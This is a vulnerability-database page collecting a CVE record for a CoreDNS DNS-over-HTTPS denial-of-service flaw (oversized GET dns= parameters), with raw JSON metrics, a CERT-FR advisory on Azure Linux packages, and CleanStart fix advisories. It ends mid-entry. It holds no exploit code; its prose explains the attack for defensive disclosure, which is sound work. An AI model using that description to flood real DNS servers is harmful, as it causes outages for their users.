Action not permitted
Modal body text goes here.
Modal Title
Modal Body
CVE-2026-32936 (GCVE-0-2026-32936)
Vulnerability from cvelistv5 – Published: 2026-05-05 19:07 – Updated: 2026-05-05 19:32
VLAI
EPSS
Title
CoreDNS DoH GET path missing size validation causes CPU and memory amplification
Summary
CoreDNS is a DNS server that chains plugins. In versions prior to 1.14.3, the DNS-over-HTTPS (DoH) GET path accepts oversized dns= query parameter values and performs URL query parsing, base64 decoding, and DNS message unpacking before rejecting the request. Unlike the POST path, which applies a bounded read via http.MaxBytesReader limited to 65536 bytes, the GET path has no equivalent size validation before expensive processing. A remote, unauthenticated attacker can repeatedly send oversized DoH GET requests to force high CPU usage, large transient memory allocations, and elevated garbage-collection pressure, leading to denial of service. This issue has been fixed in version 1.14.3.
Severity
SSVC
Exploitation: poc
Automatable: yes
Technical Impact: partial
CISA Coordinator (v2.0.3)
CWE
- CWE-400 - Uncontrolled Resource Consumption
Assigner
References
2 references
| URL | Tags |
|---|---|
| https://github.com/coredns/coredns/security/advis… | x_refsource_CONFIRM |
| https://github.com/coredns/coredns/releases/tag/v1.14.3 | x_refsource_MISC |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-32936",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-05-05T19:32:21.653054Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-05-05T19:32:25.341Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://github.com/coredns/coredns/security/advisories/GHSA-63cw-r7xf-jmwr"
}
],
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "coredns",
"vendor": "coredns",
"versions": [
{
"status": "affected",
"version": "\u003c 1.14.3"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "CoreDNS is a DNS server that chains plugins. In versions prior to 1.14.3, the DNS-over-HTTPS (DoH) GET path accepts oversized dns= query parameter values and performs URL query parsing, base64 decoding, and DNS message unpacking before rejecting the request. Unlike the POST path, which applies a bounded read via http.MaxBytesReader limited to 65536 bytes, the GET path has no equivalent size validation before expensive processing. A remote, unauthenticated attacker can repeatedly send oversized DoH GET requests to force high CPU usage, large transient memory allocations, and elevated garbage-collection pressure, leading to denial of service. This issue has been fixed in version 1.14.3."
}
],
"metrics": [
{
"cvssV4_0": {
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 8.7,
"baseSeverity": "HIGH",
"privilegesRequired": "NONE",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
"version": "4.0",
"vulnAvailabilityImpact": "HIGH",
"vulnConfidentialityImpact": "NONE",
"vulnIntegrityImpact": "NONE"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-400",
"description": "CWE-400: Uncontrolled Resource Consumption",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-05-05T19:07:51.926Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/coredns/coredns/security/advisories/GHSA-63cw-r7xf-jmwr",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/coredns/coredns/security/advisories/GHSA-63cw-r7xf-jmwr"
},
{
"name": "https://github.com/coredns/coredns/releases/tag/v1.14.3",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/coredns/coredns/releases/tag/v1.14.3"
}
],
"source": {
"advisory": "GHSA-63cw-r7xf-jmwr",
"discovery": "UNKNOWN"
},
"title": "CoreDNS DoH GET path missing size validation causes CPU and memory amplification"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-32936",
"datePublished": "2026-05-05T19:07:51.926Z",
"dateReserved": "2026-03-17T00:05:53.282Z",
"dateUpdated": "2026-05-05T19:32:25.341Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"epss": {
"cve": "CVE-2026-32936",
"date": "2026-06-16",
"epss": "0.00672",
"percentile": "0.47078"
},
"nvd": "{\"cve\":{\"id\":\"CVE-2026-32936\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-05-05T20:16:36.010\",\"lastModified\":\"2026-05-08T16:02:28.993\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"CoreDNS is a DNS server that chains plugins. In versions prior to 1.14.3, the DNS-over-HTTPS (DoH) GET path accepts oversized dns= query parameter values and performs URL query parsing, base64 decoding, and DNS message unpacking before rejecting the request. Unlike the POST path, which applies a bounded read via http.MaxBytesReader limited to 65536 bytes, the GET path has no equivalent size validation before expensive processing. A remote, unauthenticated attacker can repeatedly send oversized DoH GET requests to force high CPU usage, large transient memory allocations, and elevated garbage-collection pressure, leading to denial of service. This issue has been fixed in version 1.14.3.\"}],\"metrics\":{\"cvssMetricV40\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"4.0\",\"vectorString\":\"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\",\"baseScore\":8.7,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"attackRequirements\":\"NONE\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"vulnConfidentialityImpact\":\"NONE\",\"vulnIntegrityImpact\":\"NONE\",\"vulnAvailabilityImpact\":\"HIGH\",\"subConfidentialityImpact\":\"NONE\",\"subIntegrityImpact\":\"NONE\",\"subAvailabilityImpact\":\"NONE\",\"exploitMaturity\":\"NOT_DEFINED\",\"confidentialityRequirement\":\"NOT_DEFINED\",\"integrityRequirement\":\"NOT_DEFINED\",\"availabilityRequirement\":\"NOT_DEFINED\",\"modifiedAttackVector\":\"NOT_DEFINED\",\"modifiedAttackComplexity\":\"NOT_DEFINED\",\"modifiedAttackRequirements\":\"NOT_DEFINED\",\"modifiedPrivilegesRequired\":\"NOT_DEFINED\",\"modifiedUserInteraction\":\"NOT_DEFINED\",\"modifiedVulnConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedVulnIntegrityImpact\":\"NOT_DEFINED\",\"modifiedVulnAvailabilityImpact\":\"NOT_DEFINED\",\"modifiedSubConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedSubIntegrityImpact\":\"NOT_DEFINED\",\"modifiedSubAvailabilityImpact\":\"NOT_DEFINED\",\"Safety\":\"NOT_DEFINED\",\"Automatable\":\"NOT_DEFINED\",\"Recovery\":\"NOT_DEFINED\",\"valueDensity\":\"NOT_DEFINED\",\"vulnerabilityResponseEffort\":\"NOT_DEFINED\",\"providerUrgency\":\"NOT_DEFINED\"}}],\"cvssMetricV31\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\",\"baseScore\":7.5,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":3.6}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-400\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:coredns.io:coredns:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"1.14.3\",\"matchCriteriaId\":\"0B1F8FE2-314C-4C38-9F18-099ACCFF0AAD\"}]}]}],\"references\":[{\"url\":\"https://github.com/coredns/coredns/releases/tag/v1.14.3\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Release Notes\"]},{\"url\":\"https://github.com/coredns/coredns/security/advisories/GHSA-63cw-r7xf-jmwr\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Mitigation\",\"Vendor Advisory\"]},{\"url\":\"https://github.com/coredns/coredns/security/advisories/GHSA-63cw-r7xf-jmwr\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"tags\":[\"Exploit\",\"Mitigation\",\"Vendor Advisory\"]}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-32936\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-05-05T19:32:21.653054Z\"}}}], \"references\": [{\"url\": \"https://github.com/coredns/coredns/security/advisories/GHSA-63cw-r7xf-jmwr\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-05-05T19:32:10.408Z\"}}], \"cna\": {\"title\": \"CoreDNS DoH GET path missing size validation causes CPU and memory amplification\", \"source\": {\"advisory\": \"GHSA-63cw-r7xf-jmwr\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV4_0\": {\"version\": \"4.0\", \"baseScore\": 8.7, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"attackRequirements\": \"NONE\", \"privilegesRequired\": \"NONE\", \"subIntegrityImpact\": \"NONE\", \"vulnIntegrityImpact\": \"NONE\", \"subAvailabilityImpact\": \"NONE\", \"vulnAvailabilityImpact\": \"HIGH\", \"subConfidentialityImpact\": \"NONE\", \"vulnConfidentialityImpact\": \"NONE\"}}], \"affected\": [{\"vendor\": \"coredns\", \"product\": \"coredns\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 1.14.3\"}]}], \"references\": [{\"url\": \"https://github.com/coredns/coredns/security/advisories/GHSA-63cw-r7xf-jmwr\", \"name\": \"https://github.com/coredns/coredns/security/advisories/GHSA-63cw-r7xf-jmwr\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/coredns/coredns/releases/tag/v1.14.3\", \"name\": \"https://github.com/coredns/coredns/releases/tag/v1.14.3\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"CoreDNS is a DNS server that chains plugins. In versions prior to 1.14.3, the DNS-over-HTTPS (DoH) GET path accepts oversized dns= query parameter values and performs URL query parsing, base64 decoding, and DNS message unpacking before rejecting the request. Unlike the POST path, which applies a bounded read via http.MaxBytesReader limited to 65536 bytes, the GET path has no equivalent size validation before expensive processing. A remote, unauthenticated attacker can repeatedly send oversized DoH GET requests to force high CPU usage, large transient memory allocations, and elevated garbage-collection pressure, leading to denial of service. This issue has been fixed in version 1.14.3.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-400\", \"description\": \"CWE-400: Uncontrolled Resource Consumption\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-05-05T19:07:51.926Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2026-32936\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-05-05T19:32:25.341Z\", \"dateReserved\": \"2026-03-17T00:05:53.282Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-05-05T19:07:51.926Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
}
}
CERTFR-2026-AVI-0608
Vulnerability from certfr_avis - Published: 2026-05-18 - Updated: 2026-05-18
De multiples vulnérabilités ont été découvertes dans Microsoft Azure Linux. Elles permettent à un attaquant de provoquer un problème de sécurité non spécifié par l'éditeur.
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
Impacted products
| Vendor | Product | Description | ||
|---|---|---|---|---|
| Microsoft | N/A | azl3 telegraf 1.31.0-19 versions antérieures à 1.31.0-20 | ||
| Microsoft | N/A | azl3 binutils 2.41-11 versions antérieures à 2.41-12 | ||
| Microsoft | N/A | azl3 gdb 13.2-7 versions antérieures à 13.2-8 | ||
| Microsoft | N/A | azl3 python-mistune 3.0.2-1 versions antérieures à 3.2.1-1 | ||
| Microsoft | N/A | azl3 httpd 2.4.66-1 versions antérieures à 2.4.67-1 | ||
| Microsoft | N/A | azl3 coredns 1.11.4-15 versions antérieures à 1.11.4-16 | ||
| Microsoft | N/A | azl3 fio 3.37-3 versions antérieures à 3.37-4 |
References
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "azl3 telegraf 1.31.0-19 versions ant\u00e9rieures \u00e0 1.31.0-20",
"product": {
"name": "N/A",
"vendor": {
"name": "Microsoft",
"scada": false
}
}
},
{
"description": "azl3 binutils 2.41-11 versions ant\u00e9rieures \u00e0 2.41-12",
"product": {
"name": "N/A",
"vendor": {
"name": "Microsoft",
"scada": false
}
}
},
{
"description": "azl3 gdb 13.2-7 versions ant\u00e9rieures \u00e0 13.2-8",
"product": {
"name": "N/A",
"vendor": {
"name": "Microsoft",
"scada": false
}
}
},
{
"description": "azl3 python-mistune 3.0.2-1 versions ant\u00e9rieures \u00e0 3.2.1-1",
"product": {
"name": "N/A",
"vendor": {
"name": "Microsoft",
"scada": false
}
}
},
{
"description": "azl3 httpd 2.4.66-1 versions ant\u00e9rieures \u00e0 2.4.67-1",
"product": {
"name": "N/A",
"vendor": {
"name": "Microsoft",
"scada": false
}
}
},
{
"description": "azl3 coredns 1.11.4-15 versions ant\u00e9rieures \u00e0 1.11.4-16",
"product": {
"name": "N/A",
"vendor": {
"name": "Microsoft",
"scada": false
}
}
},
{
"description": "azl3 fio 3.37-3 versions ant\u00e9rieures \u00e0 3.37-4",
"product": {
"name": "N/A",
"vendor": {
"name": "Microsoft",
"scada": false
}
}
}
],
"affected_systems_content": "",
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2026-33190",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-33190"
},
{
"name": "CVE-2026-6846",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-6846"
},
{
"name": "CVE-2026-33007",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-33007"
},
{
"name": "CVE-2026-30656",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-30656"
},
{
"name": "CVE-2026-42154",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-42154"
},
{
"name": "CVE-2026-33857",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-33857"
},
{
"name": "CVE-2026-33489",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-33489"
},
{
"name": "CVE-2026-32936",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-32936"
},
{
"name": "CVE-2026-23918",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23918"
},
{
"name": "CVE-2026-24072",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-24072"
},
{
"name": "CVE-2026-29168",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-29168"
},
{
"name": "CVE-2026-33079",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-33079"
},
{
"name": "CVE-2026-29169",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-29169"
},
{
"name": "CVE-2026-34032",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-34032"
},
{
"name": "CVE-2026-33006",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-33006"
},
{
"name": "CVE-2026-34059",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-34059"
},
{
"name": "CVE-2026-32934",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-32934"
},
{
"name": "CVE-2026-33523",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-33523"
}
],
"initial_release_date": "2026-05-18T00:00:00",
"last_revision_date": "2026-05-18T00:00:00",
"links": [],
"reference": "CERTFR-2026-AVI-0608",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2026-05-18T00:00:00.000000"
}
],
"risks": [
{
"description": "Non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans Microsoft Azure Linux. Elles permettent \u00e0 un attaquant de provoquer un probl\u00e8me de s\u00e9curit\u00e9 non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur.",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans Microsoft Azure Linux ",
"vendor_advisories": [
{
"published_at": "2026-05-07",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-32934",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32934"
},
{
"published_at": "2026-05-07",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-42154",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42154"
},
{
"published_at": "2026-05-03",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-6846",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-6846"
},
{
"published_at": "2026-05-03",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-30656",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-30656"
},
{
"published_at": "2026-05-07",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-24072",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-24072"
},
{
"published_at": "2026-05-07",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-34059",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-34059"
},
{
"published_at": "2026-05-07",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-32936",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32936"
},
{
"published_at": "2026-05-07",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-33007",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33007"
},
{
"published_at": "2026-05-07",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-33190",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33190"
},
{
"published_at": "2026-05-07",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23918",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23918"
},
{
"published_at": "2026-05-07",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-29168",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-29168"
},
{
"published_at": "2026-05-07",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-33523",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33523"
},
{
"published_at": "2026-05-07",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-33857",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33857"
},
{
"published_at": "2026-05-07",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-33489",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33489"
},
{
"published_at": "2026-05-07",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-33006",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33006"
},
{
"published_at": "2026-05-10",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-33079",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33079"
},
{
"published_at": "2026-05-07",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-29169",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-29169"
},
{
"published_at": "2026-05-07",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-34032",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-34032"
}
]
}
cleanstart-2026-sl86558
Vulnerability from cleanstart
Published
2026-05-21 08:10
Modified
2026-05-20 18:52
Summary
Security fixes for CVE-2024-7598, CVE-2026-32934, CVE-2026-32936, CVE-2026-33190, CVE-2026-33489, CVE-2026-33811, CVE-2026-33814, CVE-2026-35579, CVE-2026-39817, CVE-2026-39819, CVE-2026-39820, CVE-2026-39823, CVE-2026-39825, CVE-2026-39826, CVE-2026-39836, CVE-2026-42499, CVE-2026-42501, ghsa-2wpx-qpw2-g5h5, ghsa-63cw-r7xf-jmwr, ghsa-h8mm-c463-wjq3, ghsa-qhmp-q7xh-99rh, ghsa-vp29-5652-4fw9 applied in versions: 1.26.8-r0, 1.26.8-r1
Details
Multiple security vulnerabilities affect the kubernetes-dns-node-cache package. These issues are resolved in later releases. See references for individual vulnerability details.
References
| URL | Type | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
{
"affected": [
{
"package": {
"ecosystem": "CleanStart",
"name": "kubernetes-dns-node-cache"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.26.8-r1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"credits": [],
"database_specific": {},
"details": "Multiple security vulnerabilities affect the kubernetes-dns-node-cache package. These issues are resolved in later releases. See references for individual vulnerability details.",
"id": "CLEANSTART-2026-SL86558",
"modified": "2026-05-20T18:52:53Z",
"published": "2026-05-21T08:10:40.863637Z",
"references": [
{
"type": "ADVISORY",
"url": "https://github.com/cleanstart-dev/cleanstart-security-advisories/tree/main/advisories/2026/CLEANSTART-2026-SL86558.json"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2024-7598"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-32934"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-32936"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-33190"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-33489"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-33811"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-33814"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-35579"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-39817"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-39819"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-39820"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-39823"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-39825"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-39826"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-39836"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-42499"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-42501"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-2wpx-qpw2-g5h5"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-63cw-r7xf-jmwr"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-h8mm-c463-wjq3"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-qhmp-q7xh-99rh"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-vp29-5652-4fw9"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-7598"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32934"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32936"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33190"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33489"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33811"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33814"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35579"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39817"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39819"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39820"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39823"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39825"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39826"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39836"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42499"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42501"
}
],
"related": [],
"schema_version": "1.7.3",
"summary": "Security fixes for CVE-2024-7598, CVE-2026-32934, CVE-2026-32936, CVE-2026-33190, CVE-2026-33489, CVE-2026-33811, CVE-2026-33814, CVE-2026-35579, CVE-2026-39817, CVE-2026-39819, CVE-2026-39820, CVE-2026-39823, CVE-2026-39825, CVE-2026-39826, CVE-2026-39836, CVE-2026-42499, CVE-2026-42501, ghsa-2wpx-qpw2-g5h5, ghsa-63cw-r7xf-jmwr, ghsa-h8mm-c463-wjq3, ghsa-qhmp-q7xh-99rh, ghsa-vp29-5652-4fw9 applied in versions: 1.26.8-r0, 1.26.8-r1",
"upstream": [
"CVE-2024-7598",
"CVE-2026-32934",
"CVE-2026-32936",
"CVE-2026-33190",
"CVE-2026-33489",
"CVE-2026-33811",
"CVE-2026-33814",
"CVE-2026-35579",
"CVE-2026-39817",
"CVE-2026-39819",
"CVE-2026-39820",
"CVE-2026-39823",
"CVE-2026-39825",
"CVE-2026-39826",
"CVE-2026-39836",
"CVE-2026-42499",
"CVE-2026-42501",
"ghsa-2wpx-qpw2-g5h5",
"ghsa-63cw-r7xf-jmwr",
"ghsa-h8mm-c463-wjq3",
"ghsa-qhmp-q7xh-99rh",
"ghsa-vp29-5652-4fw9"
]
}
cleanstart-2026-vj54611
Vulnerability from cleanstart
Published
2026-05-21 08:11
Modified
2026-05-20 18:52
Summary
